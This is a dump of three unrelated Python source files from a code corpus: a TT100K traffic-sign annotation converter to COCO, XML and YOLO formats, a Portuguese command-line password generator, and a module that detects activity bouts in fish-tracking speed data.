licenses\n val_dataset['licenses'] = licenses\n test_dataset['licenses'] = licenses\n\n # 建立类别和id的关系\n for i, cls in enumerate(classes):\n train_dataset['categories'].append({'id': i, 'name': cls, 'supercategory': 'traffic_sign'})\n val_dataset['categories'].append({'id': i, 'name': cls, 'supercategory': 'traffic_sign'})\n test_dataset['categories'].append({'id': i, 'name': cls, 'supercategory': 'traffic_sign'})\n label[cls] = i\n\n images_dic = origin_dict['imgs']\n\n obj_id = 1\n\n # TT100K的annotation转换成coco的\n for image_id in images_dic:\n image_element = images_dic[image_id]\n image_path = image_element['path']\n\n # 用opencv读取图片,得到图像的宽和高\n im = cv2.imread(os.path.join(parent_path, image_path))\n H, W, _ = im.shape\n\n # 切换dataset的引用对象,从而划分数据集\n if 'train' in image_path:\n dataset = train_dataset\n elif 'test' in image_path:\n dataset = val_dataset\n else:\n dataset = test_dataset\n\n # 添加图像的信息到dataset中\n image_path = image_path.split('/')[-1]\n dataset['images'].append({'file_name': image_path,\n 'id': image_id,\n 'width': W,\n 'height': H})\n obj_list = image_element['objects']\n\n for anno_dic in obj_list:\n x = anno_dic['bbox']['xmin']\n y = anno_dic['bbox']['ymin']\n width = anno_dic['bbox']['xmax'] - anno_dic['bbox']['xmin']\n height = anno_dic['bbox']['ymax'] - anno_dic['bbox']['ymin']\n label_key = anno_dic['category']\n\n dataset['annotations'].append({\n 'area': width * height,\n 'bbox': [x, y, width, height],\n 'category_id': label[label_key],\n 'id': obj_id,\n 'image_id': image_id,\n 'iscrowd': 0,\n # mask, 矩形是从左上角点按顺时针的四个顶点\n 'segmentation': [[x, y, x + width, y, x + width, y + height, x, y + height]]\n })\n # 每个标注的对象id唯一\n obj_id += 1\n\n # 保存结果\n for phase in ['train', 'val', 'test']:\n json_name = os.path.join(parent_path, 'annotations/{}.json'.format(phase))\n with open(json_name, 'w', encoding=\"utf-8\") as f:\n if phase == 'train':\n json.dump(train_dataset, f, ensure_ascii=False, indent=1)\n if phase == 'val':\n json.dump(val_dataset, f, ensure_ascii=False, indent=1)\n if phase == 'test':\n json.dump(test_dataset, f, ensure_ascii=False, indent=1)\n\n def original_datasets2object_datasets_re(self):\n '''\n 重新划分数据集\n :return:\n '''\n # os.makedirs('annotations2', exist_ok=True)\n # 存放数据的父路径\n parent_path = 'E:/dataset/tt100k_2021'\n\n # 读TT100K原始数据集标注文件\n with open(os.path.join(parent_path, 'annotations.json')) as origin_json:\n origin_dict = json.load(origin_json)\n\n with open(os.path.join(parent_path, 'statistics.json')) as select_json:\n select_dict = json.load(select_json)\n classes = select_dict['type']\n\n train_dataset = {'info': {}, 'licenses': [], 'categories': [], 'images': [], 'annotations': []}\n val_dataset = {'info': {}, 'licenses': [], 'categories': [], 'images': [], 'annotations': []}\n test_dataset = {'info': {}, 'licenses': [], 'categories': [], 'images': [], 'annotations': []}\n label = {} # 记录每个标志类别的id\n count = {} # 记录每个类别的图片数\n owntype_sum = {}\n\n info = {\n \"year\": 2021, # 年份\n \"version\": '1.0', # 版本\n \"description\": \"TT100k_to_coco\", # 数据集描述\n \"contributor\": \"Tecent&Tsinghua\", # 提供者\n \"url\": 'https://cg.cs.tsinghua.edu.cn/traffic-sign/', # 下载地址\n \"date_created\": 2021 - 1 - 15\n }\n licenses = {\n \"id\": 1,\n \"name\": \"null\",\n \"url\": \"null\",\n }\n\n train_dataset['info'] = info\n val_dataset['info'] = info\n test_dataset['info'] = info\n train_dataset['licenses'] = licenses\n val_dataset['licenses'] = licenses\n test_dataset['licenses'] = licenses\n\n # 建立类别和id的关系\n for i, cls in enumerate(classes):\n 
train_dataset['categories'].append({'id': i, 'name': cls, 'supercategory': 'traffic_sign'})\n val_dataset['categories'].append({'id': i, 'name': cls, 'supercategory': 'traffic_sign'})\n test_dataset['categories'].append({'id': i, 'name': cls, 'supercategory': 'traffic_sign'})\n label[cls] = i\n count[cls] = 0\n owntype_sum[cls] = 0\n\n images_dic = origin_dict['imgs']\n\n obj_id = 1\n\n # 计算出每个类别共‘包含’的图片数\n for image_id in images_dic:\n\n image_element = images_dic[image_id]\n image_path = image_element['path']\n image_name = image_path.split('/')[-1]\n # 在所选的类别图片中\n if image_name not in select_dict['images']:\n continue\n\n # 处理TT100K中的标注信息\n obj_list = image_element['objects']\n # 记录图片中包含最多的实例所属的type\n includes_type = {}\n for anno_dic in obj_list:\n if anno_dic[\"category\"] not in select_dict[\"type\"]:\n continue\n # print(anno_dic[\"category\"])\n if anno_dic[\"category\"] in includes_type:\n includes_type[anno_dic[\"category\"]] += 1\n else:\n includes_type[anno_dic[\"category\"]] = 1\n # print(includes_type)\n own_type = max(includes_type, key=includes_type.get)\n owntype_sum[own_type] += 1\n\n # TT100K的annotation转换成coco的\n for image_id in images_dic:\n\n image_element = images_dic[image_id]\n image_path = image_element['path']\n image_name = image_path.split('/')[-1]\n # 在所选的类别图片中\n if image_name not in select_dict['images']:\n continue\n print(\"dealing with {} image\".format(image_path))\n # shutil.copy(os.path.join(parent_path,image_path),os.path.join(parent_path,\"dataset/JPEGImages\"))\n\n # 处理TT100K中的标注信息\n obj_list = image_element['objects']\n # 记录图片中包含最多的实例所属的type\n includes_type = {}\n for anno_dic in obj_list:\n if anno_dic[\"category\"] not in select_dict[\"type\"]:\n continue\n # print(anno_dic[\"category\"])\n if anno_dic[\"category\"] in includes_type:\n includes_type[anno_dic[\"category\"]] += 1\n else:\n includes_type[anno_dic[\"category\"]] = 1\n # print(includes_type)\n own_type = max(includes_type, key=includes_type.get)\n count[own_type] += 1\n num_rate = count[own_type] / owntype_sum[own_type]\n\n # 切换dataset的引用对象,从而划分数据集根据每个类别类别的总数量按7:2:1分为了train_set,val_set,test_set。\n # 其中每个图片所属类别根据该图片包含的类别的数量决定(归属为含有类别最多的类别)\n if num_rate < 0.7:\n dataset = train_dataset\n elif num_rate < 0.9:\n dataset = val_dataset\n else:\n print(\"dataset=test_dataset\")\n dataset = test_dataset\n\n for anno_dic in obj_list:\n if anno_dic[\"category\"] not in select_dict[\"type\"]:\n continue\n x = anno_dic['bbox']['xmin']\n y = anno_dic['bbox']['ymin']\n width = anno_dic['bbox']['xmax'] - anno_dic['bbox']['xmin']\n height = anno_dic['bbox']['ymax'] - anno_dic['bbox']['ymin']\n label_key = anno_dic['category']\n\n dataset['annotations'].append({\n 'area': width * height,\n 'bbox': [x, y, width, height],\n 'category_id': label[label_key],\n 'id': obj_id,\n 'image_id': image_id,\n 'iscrowd': 0,\n # mask, 矩形是从左上角点按顺时针的四个顶点\n 'segmentation': [[x, y, x + width, y, x + width, y + height, x, y + height]]\n })\n # 每个标注的对象id唯一\n obj_id += 1\n\n # 用opencv读取图片,得到图像的宽和高\n im = cv2.imread(os.path.join(parent_path, image_path))\n # print(image_path)\n H, W, _ = im.shape\n # 添加图像的信息到dataset中\n dataset['images'].append({'file_name': image_name,\n 'id': image_id,\n 'width': W,\n 'height': H})\n\n # 保存结果\n for phase in ['train', 'val', 'test']:\n json_name = os.path.join(parent_path, 'data/dataset/annotations/{}.json'.format(phase))\n with open(json_name, 'w', encoding=\"utf-8\") as f:\n if phase == 'train':\n json.dump(train_dataset, f, ensure_ascii=False, indent=1)\n if phase == 'val':\n 
json.dump(val_dataset, f, ensure_ascii=False, indent=1)\n if phase == 'test':\n json.dump(test_dataset, f, ensure_ascii=False, indent=1)\n\n def json2xml(self):\n img_path = 'E:/dataset/tt100k_2021/data/train/' # train图片路径\n annos = json.loads(open(\"E:/dataset/tt100k_2021/data/annotations.json\").read())\n xml_path = 'E:/dataset/tt100k_2021data/xml_train/' # xml保存路径\n\n for line in open(img_path + \"ids.txt\"):\n img_name = line.replace('\\n', '')\n img_file = img_name + '.jpg'\n img = cv2.imread(img_path + img_file)\n sp = img.shape\n img_height = str(sp[0]) # height(rows) of image\n img_width = str(sp[1])\n\n doc = xml.dom.minidom.Document()\n # creat a root node which name is annotation\n annotation = doc.createElement('annotation')\n # add the root node to the dom document object\n doc.appendChild(annotation)\n\n # add the folder subnode\n folder = doc.createElement('folder')\n folder_text = doc.createTextNode('JPEGImages')\n folder.appendChild(folder_text)\n annotation.appendChild(folder)\n\n # add the filename subnode\n filename = doc.createElement('filename')\n filename_text = doc.createTextNode(img_file)\n filename.appendChild(filename_text)\n annotation.appendChild(filename)\n\n # add the path subnode\n path = doc.createElement('path')\n path_text = doc.createTextNode(\n img_path + img_file)\n path.appendChild(path_text)\n annotation.appendChild(path)\n\n # add the source subnode\n source = doc.createElement('source')\n database = doc.createElement('database')\n database_text = doc.createTextNode('Unknown')\n source.appendChild(database)\n database.appendChild(database_text)\n annotation.appendChild(source)\n\n # add the size subnode\n size = doc.createElement('size')\n width = doc.createElement('width')\n width_text = doc.createTextNode(img_width)\n height = doc.createElement('height')\n height_text = doc.createTextNode(img_height)\n depth = doc.createElement('depth')\n depth_text = doc.createTextNode('3')\n size.appendChild(width)\n width.appendChild(width_text)\n size.appendChild(height)\n height.appendChild(height_text)\n size.appendChild(depth)\n depth.appendChild(depth_text)\n annotation.appendChild(size)\n\n segmented = doc.createElement('segmented')\n segmented_text = doc.createTextNode('0')\n segmented.appendChild(segmented_text)\n annotation.appendChild(segmented)\n\n img_objects = annos[\"imgs\"][img_name]['objects']\n for i in range(0, len(img_objects)):\n obj_category = annos[\"imgs\"][img_name]['objects'][i]['category']\n obj_bbox = annos[\"imgs\"][img_name]['objects'][i]['bbox']\n bbox_ymin = int(annos[\"imgs\"][img_name]['objects'][i]['bbox']['ymin'])\n bbox_xmin = int(annos[\"imgs\"][img_name]['objects'][i]['bbox']['xmin'])\n bbox_ymax = int(annos[\"imgs\"][img_name]['objects'][i]['bbox']['ymax'])\n bbox_xmax = int(annos[\"imgs\"][img_name]['objects'][i]['bbox']['xmax'])\n print(obj_category, bbox_ymin, bbox_xmin, bbox_ymax, bbox_xmax)\n\n object = doc.createElement('object')\n name = doc.createElement('name')\n name_text = doc.createTextNode(obj_category)\n difficult = doc.createElement('difficult')\n difficult_text = doc.createTextNode('0')\n pose = doc.createElement('pose')\n pose_text = doc.createTextNode('Unspecified')\n truncated = doc.createElement('truncated')\n truncated_text = doc.createTextNode('0')\n bndbox = doc.createElement('bndbox')\n xmin = doc.createElement('xmin')\n xmin_text = doc.createTextNode(str(bbox_xmin))\n ymin = doc.createElement('ymin')\n ymin_text = doc.createTextNode(str(bbox_ymin))\n xmax = doc.createElement('xmax')\n xmax_text = 
doc.createTextNode(str(bbox_xmax))\n ymax = doc.createElement('ymax')\n ymax_text = doc.createTextNode(str(bbox_ymax))\n object.appendChild(name)\n name.appendChild(name_text)\n object.appendChild(pose)\n pose.appendChild(pose_text)\n object.appendChild(truncated)\n truncated.appendChild(truncated_text)\n object.appendChild(difficult)\n difficult.appendChild(difficult_text)\n object.appendChild(bndbox)\n bndbox.appendChild(xmin)\n xmin.appendChild(xmin_text)\n bndbox.appendChild(ymin)\n ymin.appendChild(ymin_text)\n bndbox.appendChild(xmax)\n xmax.appendChild(xmax_text)\n bndbox.appendChild(ymax)\n ymax.appendChild(ymax_text)\n annotation.appendChild(object)\n fp = open(xml_path + '%s.xml' % img_name, 'w+')\n doc.writexml(fp, indent='\\t', addindent='\\t', newl='\\n', encoding='utf-8')\n # print(annos[\"imgs\"][img_name]['objects'])\n fp.close()\n\n def coco_json2yolo_txt(self, class_json):\n # COCO 格式的数据集转化为 YOLO 格式的数据集\n # --json_path 输入的json文件路径\n # --save_path 保存的文件夹名字,默认为当前目录下的labels。\n\n\n parser = argparse.ArgumentParser()\n # 这里根��自己的json文件位置,换成自己的就行\n parser.add_argument('--json_path',\n default='E:/dataset/tt100k_2021/data/dataset/annotations/train.json',\n type=str, help=\"input: coco format(json)\")\n # 这里设置.txt文件保存位置\n parser.add_argument('--save_path', default='E:/dataset/tt100k_2021/data/dataset/annotations/', type=str,\n help=\"specify where to save the output dir of labels\")\n arg = parser.parse_args()\n\n\n def convert(size, box):\n dw = 1. / (size[0])\n dh = 1. / (size[1])\n x = box[0] + box[2] / 2.0\n y = box[1] + box[3] / 2.0\n w = box[2]\n h = box[3]\n # round函数确定(xmin, ymin, xmax, ymax)的小数位数\n x = round(x * dw, 6)\n w = round(w * dw, 6)\n y = round(y * dh, 6)\n h = round(h * dh, 6)\n return (x, y, w, h)\n\n # class_json = 'train'\n json_file = os.path.join(\n 'E:/dataset/tt100k_2021/data/dataset/annotations/%s.json' % class_json) # COCO Object Instance 类型的标注\n # ana_txt_save_path = 'D:/jinxData/TT100K/data/dataset/annotations/train' # 保存的路径\n ana_txt_save_path = os.path.join('E:/dataset/tt100k_2021/data/dataset/annotations', class_json) # 保存的路径\n\n data = json.load(open(json_file, 'r'))\n if not os.path.exists(ana_txt_save_path):\n os.makedirs(ana_txt_save_path)\n\n id_map = {} # coco数据集的id不连续!重新映射一下再输出!\n with open(os.path.join(ana_txt_save_path, 'classes.txt'), 'w') as f:\n # 写入classes.txt\n for i, category in enumerate(data['categories']):\n f.write(f\"{category['name']}\\n\")\n id_map[category['id']] = i\n # print(id_map)\n # 这里需要根据自己的需要,更改写入图像相对路径的文件位置。\n list_file = open(os.path.join(ana_txt_save_path, '%s.txt' % class_json.format()), 'w')\n for img in tqdm(data['images']):\n filename = img[\"file_name\"]\n img_width = img[\"width\"]\n img_height = img[\"height\"]\n img_id = img[\"id\"]\n head, tail = os.path.splitext(filename)\n ana_txt_name = head + \".txt\" # 对应的txt名字,与jpg一致\n f_txt = open(os.path.join(ana_txt_save_path, ana_txt_name), 'w')\n for ann in data['annotations']:\n if ann['image_id'] == img_id:\n box = convert((img_width, img_height), ann[\"bbox\"])\n f_txt.write(\"%s %s %s %s %s\\n\" % (id_map[ann[\"category_id\"]], box[0], box[1], box[2], box[3]))\n f_txt.close()\n # 将图片的相对路径写入train2017或val2017的路径\n list_file.write('/%s/%s.jpg\\n' % (class_json.format(), head))\n list_file.close()\n\n def divide_TrainValTest(self, source, target):\n '''\n 创建文件路径\n :param source: 源文件位置\n :param target: 目标文件位置\n '''\n for i in ['train', 'val', 'test']:\n path = target + '/' + i\n if not os.path.exists(path):\n os.makedirs(path)\n\n # 遍历目录下的文件名,复制对应的图片到指定目录\n for 
root, dirs, files in os.walk(source):\n for file in files:\n file_name = os.path.splitext(file)[0]\n image_path = os.path.join(file_name + '.jpg')\n # print(source)\n if 'train' in source:\n shutil.copyfile('E:/dataset/tt100k_2021/image_reparation/'\n + image_path, target + '/train/' + image_path)\n elif 'val' in source:\n shutil.copyfile('E:/dataset/tt100k_2021/image_reparation/'\n + image_path, target + '/val/' + image_path)\n elif 'test' in source:\n shutil.copyfile('E:/dataset/tt100k_2021/image_reparation/'\n + image_path, target + '/test/' + image_path)\n\n def xml2txt(self):\n # coding:utf-8\n\n parser = argparse.ArgumentParser()\n # xml文件的地址,根据自己的数据进行修改 xml一般存放在Annotations下\n parser.add_argument('--xml_path', default='xml', type=str, help='input xml label path')\n # 数据集的划分,地址选择自己数据下的ImageSets/Main\n parser.add_argument('--txt_path', default='dataSet', type=str, help='output txt label path')\n opt = parser.parse_args()\n\n trainval_percent = 1.0\n train_percent = 0.9\n xmlfilepath = opt.xml_path\n txtsavepath = opt.txt_path\n total_xml = os.listdir(xmlfilepath)\n if not os.path.exists(txtsavepath):\n os.makedirs(txtsavepath)\n\n num = len(total_xml)\n list_index = range(num)\n tv = int(num * trainval_percent)\n tr = int(tv * train_percent)\n trainval = random.sample(list_index, tv)\n train = random.sample(trainval, tr)\n\n file_trainval = open(txtsavepath + '/trainval.txt', 'w')\n file_test = open(txtsavepath + '/test.txt', 'w')\n file_train = open(txtsavepath + '/train.txt', 'w')\n file_val = open(txtsavepath + '/val.txt', 'w')\n\n for i in list_index:\n name = total_xml[i][:-4] + '\\n'\n if i in trainval:\n file_trainval.write(name)\n if i in train:\n file_train.write(name)\n else:\n file_val.write(name)\n else:\n file_test.write(name)\n\n file_trainval.close()\n file_train.close()\n file_val.close()\n file_test.close()\n\n\nif __name__ == '__main__':\n tt100k = TT100K2COCO()\n #tt100k.class_statistics()\n #tt100k.original_datasets2object_datasets_re()\n #tt100k.coco_json2yolo_txt('train')\n #tt100k.coco_json2yolo_txt('test')\n #tt100k.coco_json2yolo_txt('val')\n\n tt100k.divide_TrainValTest('E:/dataset/tt100k_2021/data/dataset/annotations/val', 'E:/dataset/tt100k_2021/data')\n","repo_name":"Truoji/yolov5s-jtbz-npu","sub_path":"jtbz/tt100k2yolo.py","file_name":"tt100k2yolo.py","file_ext":"py","file_size_in_byte":26182,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"} +{"seq_id":"27089620979","text":"import string\nimport random\n\nprint('\\n Gerador de senhas \\n')\ns1 = list(string.ascii_lowercase)\ns2 = list(string.ascii_uppercase)\ns3 = list(string.digits)\ns4 = list(string.punctuation)\n\nwhile True:\n try:\n escolha_usuario = int(input('Digite o tamanho da senha: '))\n quantidade_caracteres = int(escolha_usuario)\n print('Escolha uma opcao: ')\n print('1-Senha basica')\n print('2-Senha forte')\n print('3-Mais informacoes')\n escolha_usuario2 = int(input(''))\n if escolha_usuario2 == 3:\n print('Senha basica: Letras maiusculas, minusculas e numeros')\n print('Senha Forte: Letras maiusculas e minusculas, numeros e simbolos')\n escolha_usuario2 = int(input('Agora escolha uma opcao: '))\n elif escolha_usuario2 > 3 or escolha_usuario2 < 1:\n print('Opcao invalida')\n escolha_usuario2 = int(input('Escolha uma opcao valida: '))\n \n\n if quantidade_caracteres < 5:\n print('A senha deve ter no minimo 5 caracter')\n escolha_usuario = int(input('Digite o tamanho da senha: '))\n elif quantidade_caracteres > 52:\n print('A senha nao pode 
ter mais de 52 caracteres')\n escolha_usuario = int(input('Digite o tamanho da senha: '))\n else:\n break\n except ValueError:\n print('Digite apenas numeros')\n\ndef senha_basica():\n random.shuffle(s1)\n random.shuffle(s2)\n part1 = round(quantidade_caracteres * (40/100))\n part2 = round(quantidade_caracteres * (40/100))\n part3 = round(quantidade_caracteres * (20/100))\n\n resultado = []\n for x in range(part1):\n resultado.append(s1[x])\n \n for x in range(part2):\n resultado.append(s2[x])\n\n for x in range(part3):\n resultado.append(s3[x])\n \n random.shuffle(resultado)\n senha = ''.join(resultado)\n print(f'Senha gerada: {senha}')\n\n\ndef senha_forte():\n #emabralhar tudo\n random.shuffle(s1)\n random.shuffle(s2)\n random.shuffle(s3)\n random.shuffle(s4)\n\n part1 = round(quantidade_caracteres * (30/100))\n part2 = round(quantidade_caracteres * (20/100))\n\n resultado = []\n for x in range(part1):\n resultado.append(s1[x])\n resultado.append(s2[x])\n\n for x in range(part2):\n resultado.append(s3[x])\n resultado.append(s4[x])\n\n random.shuffle(resultado)\n senha = ''.join(resultado)\n print(f'Senha gerada: {senha}')\n\n\nif escolha_usuario2 == 1:\n senha_basica()\nelif escolha_usuario2 == 2:\n senha_forte()","repo_name":"CaueConte/gerador-de-senhas","sub_path":"codigo.py","file_name":"codigo.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34555640660","text":"import numpy as np\nimport pandas as pd\n\nfrom cichlidanalysis.analysis.processing import threshold_data\n\n\ndef find_bout_start_ends(bout_array):\n \"\"\" Takes a np.array of zeros and ones and determines the start/stop of the one streches. Assumes no NaNs.\n\n :param bout_array:\n :return: bout_start_t, bout_end_t\n \"\"\"\n # test that the array has no NaNs\n if max(np.isnan(bout_array)):\n print(\"NaN in bout_array therefore cannot run bout_speeds\")\n return False\n else:\n # determine bout starts and finishes\n changes = np.diff(bout_array, axis=0)\n\n # added 1 to active_bout_start as otherwise it is the last timepoint that was below the threshold.\n # Also did it to ends so a peak of one timepoint would have a length of 1.\n bout_start = np.asarray(np.where(changes == 1)) + 1\n bout_end = np.asarray(np.where(changes == -1)) + 1\n\n # determine if array started with a bout\n if bout_array[0] == 1:\n # first bout is ongoing, remove first bout as it is incomplete\n bout_start_t = bout_start[0, ]\n bout_end_t = bout_end[0, 1:]\n else:\n # take all starts (and ends)\n bout_start_t = bout_start[0, ]\n bout_end_t = bout_end[0, ]\n\n # remove incomplete bouts (e.g. those that do not end), in this case there will be one less end than start\n if bout_start_t.shape != bout_end_t.shape:\n if bout_start_t.shape > bout_end_t.shape:\n bout_start_t = bout_start_t[0:-1]\n else:\n print(\"something weird with number of bouts?\")\n return False\n\n # determine active inter-bout interval\n bout_lengths = bout_end_t - bout_start_t\n\n return bout_start_t, bout_end_t, bout_lengths\n\n\ndef find_bout_start_ends_inclusive(bout_array):\n \"\"\" Takes a np.array of zeros and ones and determines the start/stop of the one streches. 
Assumes no NaNs.\n Includes streches which are at the edge\n\n :param bout_array:\n :return: bout_start, bout_end\n \"\"\"\n # test that the array has no NaNs\n if max(np.isnan(bout_array)):\n print(\"NaN in bout_array therefore cannot run bout_speeds\")\n return False\n else:\n # determine bout starts and finishes\n changes = np.diff(bout_array, axis=0)\n\n # added 1 to active_bout_start as otherwise it is the last timepoint that was below the threshold.\n # Also did it to ends so a peak of one timepoint would have a length of 1.\n bout_start = (np.asarray(np.where(changes == 1)) + 1)[0]\n bout_end = (np.asarray(np.where(changes == -1)) + 1)[0]\n\n # determine if array ends with a bout\n if bout_array[-1] == 1:\n # if so add in a end\n bout_end = np.concatenate((bout_end, np.array([len(bout_array)])), axis=0)\n\n # determine if array started with a bout\n if bout_array[0] == 1:\n # first bout is ongoing, add first bout as it is incomplete\n bout_start = np.concatenate((np.array([0]), bout_start), axis=0)\n\n return bout_start, bout_end\n\n\ndef bout_speeds(bout_array, speed):\n \"\"\" For each bout (1 in array, not a zero, assumes no NaNs in data), find the speed of that bout\n :param bout_array:\n :param speed:\n :return: speed_active, bout_max, bout_speed\n \"\"\"\n # test that the array has no NaNs\n if max(np.isnan(bout_array)):\n print(\"NaN in bout_array therefore cannot run bout_speeds\")\n return False\n else:\n # find global speed within active bouts\n speed_active = speed[bout_array > 0.5]\n\n # find bout starts, ends and lengths\n bout_start, bout_end, bout_lengths = find_bout_start_ends(bout_array)\n bout_number = bout_start.shape[0]\n\n # for every bout, find the max speed\n bout_max = np.zeros(bout_start.shape[0])\n for bout_n in np.linspace(0, bout_number - 1, bout_number):\n bout_max[int(bout_n)] = np.max(speed[bout_start[int(bout_n)]:(bout_start[int(bout_n)] + bout_lengths[int(bout_n)])])\n\n return speed_active, bout_max\n\n\ndef triggered_bout_speed(bout_array, speed, pre, post):\n \"\"\" for every bout extract the speed \"pre\" time points before to \"post\" time points after.\n :param bout_array\n :param speed\n :param pre\n :param post\n :return: trig_bout_spd\n \"\"\"\n # test that the array has no NaNs\n if max(np.isnan(bout_array)):\n print(\"NaN in bout_array therefore cannot run bout_speeds\")\n return False\n else:\n # find bout starts, ends and lengths\n bout_start, bout_end, bout_lengths = find_bout_start_ends(bout_array)\n bout_number = bout_start.shape[0]\n\n # for every bout extract the speed \"pre\" time points before to \"post\" time points after.\n trig_bout_spd = np.empty([bout_start.shape[0], np.max(bout_lengths)]) # max(bout_lengths)+15]) # fps*10])\n trig_bout_spd[:] = np.nan\n\n for bout in np.linspace(0, bout_number - 1, bout_number):\n # extract out speed data from \"pre\" time points before to \"post\" time points after.\n if ((bout_start[int(bout)] - pre) > 0) & ((bout_start[int(bout)] + post) < speed.shape[0]):\n trig_bout_spd[int(bout), 0:(pre + post)] = (speed[(bout_start[int(bout)] - pre):(bout_start[int(bout)]\n + post)]).reshape(pre + post)\n\n return trig_bout_spd\n\n\ndef find_bouts(speed, threshold):\n \"\"\" Finds active and quiescent bouts, including where they start, how long they are etc\n :param speed (smoothed)\n :param threshold: speed threshold to determine active/quiescent\n :return: active_bout_lengths, active_bout_end_t, active_bout_start_t, quiescent_bout_lengths, quiescent_bout_end_t,\n quiescent_bout_start_t, 
active_bout_max\n\n assume no NaNs??\n \"\"\"\n # improvements to do: deal with nans in the middle of data\n # one way to do that would be to break apart blocks at NaNs. So there would be a loop to add in uninterrupted blocks\n # need to keep track and accumulate blocks in same category (e.g. night)\n\n active_indices = threshold_data(speed, threshold)\n inactive_indices = (active_indices != 1) * 1\n\n # for active\n active_bout_start, active_bout_end, active_bout_lengths = find_bout_start_ends(active_indices)\n active_speed, active_bout_max = bout_speeds(active_indices, speed)\n\n # for inactive\n inactive_bout_start, inactive_bout_end, inactive_bout_lengths = find_bout_start_ends(inactive_indices)\n inactive_speed, inactive_bout_max = bout_speeds(inactive_indices, speed)\n\n return active_bout_lengths, active_bout_end, active_bout_start, inactive_bout_lengths, inactive_bout_end, \\\n inactive_bout_start, active_speed, active_bout_max, active_indices, inactive_speed, inactive_bout_max, \\\n inactive_indices\n\n\ndef find_bout_start_ends_pd(bout_array):\n \"\"\" Takes a np.array of zeros and ones and determines the start/stop of the one streches. Assumes no NaNs.\n\n :param bout_array:\n :return: bout_start_t, bout_end_t\n \"\"\"\n # test that the array has no NaNs\n if max(np.isnan(bout_array)):\n print(\"NaN in bout_array therefore cannot run find_bout_start_ends_pd\")\n return False\n else:\n # determine bout starts and finishes\n changes = np.diff(bout_array, axis=0)\n\n # added 1 to active_bout_start as otherwise it is the last timepoint that was below the threshold.\n # Also did it to ends so a peak of one timepoint would have a length of 1.\n bout_start = np.asarray(np.where(changes == 1)) + 1\n bout_end = np.asarray(np.where(changes == -1)) + 1\n\n # determine if array started with a bout\n if bout_array[0] == 1:\n # first bout is ongoing, remove first bout as it is incomplete\n bout_start_t = bout_start[0, ]\n bout_end_t = bout_end[0, 1:]\n else:\n # take all starts (and ends)\n bout_start_t = bout_start[0, ]\n bout_end_t = bout_end[0, ]\n\n # remove incomplete bouts (e.g. 
those that do not end), in this case there will be one less end than start\n if bout_start_t.shape != bout_end_t.shape:\n if bout_start_t.shape > bout_end_t.shape:\n bout_start_t = bout_start_t[0:-1]\n else:\n print(\"something weird with number of bouts?\")\n return False\n\n # determine active inter-bout interval\n bout_lengths = bout_end_t - bout_start_t\n\n return bout_start_t, bout_end_t, bout_lengths\n\n\ndef find_bouts_input(fish_tracks_i, change_times_m, measure='rest'):\n \"\"\" Finds active and inactive bouts, including where they start, how long they are etc\n :param fish_tracks_i:\n :param measure: what to measure in the fish_tracks\n :return: fish_bouts: a dataframe with time stamps of start and ends of \"1\" or \"True\" bouts in the given data.\n \"\"\"\n fishes = fish_tracks_i['FishID'].unique()\n first = True\n\n for fish in fishes:\n all_bout_starts = pd.Series()\n all_bout_ends = pd.Series()\n\n # get individual fish\n fish_tracks_f = fish_tracks_i[fish_tracks_i.FishID == fish][['ts', measure]]\n\n # check if there are NaNs\n if np.max(np.isnan(fish_tracks_f.iloc[:, 1])):\n # break up NaN stretches\n non_nan_array = abs(((np.isnan(fish_tracks_f.iloc[:, 1])) * 1)-1)\n non_nan_array = non_nan_array.to_numpy()\n data_start, data_end = find_bout_start_ends_inclusive(non_nan_array)\n else:\n data_start, data_end = [0], [len(fish_tracks_f)]\n\n for strech_n in np.arange(0, len(data_start)):\n # calulate data stretches starts and ends\n data_stretch = fish_tracks_f.iloc[data_start[strech_n]:data_end[strech_n], 1]\n data_stetch_ts = fish_tracks_f.iloc[data_start[strech_n]:data_end[strech_n], 0]\n bout_start, bout_end, _ = find_bout_start_ends(data_stretch.to_numpy())\n # add the time stamps of found starts and ends to pd.Series\n all_bout_starts = pd.concat([all_bout_starts.reset_index(drop=True), data_stetch_ts.iloc[bout_start].\n reset_index(drop=True)])\n all_bout_ends = pd.concat([all_bout_ends.reset_index(drop=True), data_stetch_ts.iloc[bout_end].\n reset_index(drop=True)])\n\n # import matplotlib.pyplot as plt\n # plt.plot(fish_tracks_f.iloc[data_start[strech_n]:data_end[strech_n], 0], data_stretch)\n # plt.scatter(all_bout_starts, np.zeros([1, len(all_bout_starts)]), color='r')\n # plt.scatter(all_bout_ends, np.zeros([1, len(all_bout_starts)]), color='b')\n\n # find bout lengths for measure and nonmeasure\n all_bout_measure_lengths = all_bout_ends - all_bout_starts\n all_bout_nonmeasure_lengths = all_bout_starts.to_numpy()[1:] - all_bout_ends.to_numpy()[0:-1]\n\n # make fish_bouts df\n fish_bouts_i = pd.concat([all_bout_starts.reset_index(drop=True), all_bout_ends.reset_index(drop=True),\n all_bout_measure_lengths.reset_index(drop=True), pd.Series(all_bout_nonmeasure_lengths)],\n axis=1)\n fish_bouts_i.columns = ['bout_start', 'bout_end', measure + '_len', 'non' + measure + '_len']\n fish_bouts_i['FishID'] = fish\n\n # combine with the other fish\n if first:\n fish_bouts = fish_bouts_i\n first = False\n else:\n fish_bouts = pd.concat([fish_bouts, fish_bouts_i], axis=0)\n\n fish_bouts = fish_bouts.reset_index(drop=True)\n\n # add new column with Day or Night\n fish_bouts['time_of_day_m'] = fish_bouts.bout_start.apply(lambda row: int(str(row)[11:16][:-3]) * 60 +\n int(str(row)[11:16][-2:]))\n\n fish_bouts['daynight'] = \"d\"\n fish_bouts.loc[fish_bouts.time_of_day_m < change_times_m[0], 'daynight'] = \"n\"\n fish_bouts.loc[fish_bouts.time_of_day_m > change_times_m[3], 'daynight'] = \"n\"\n\n 
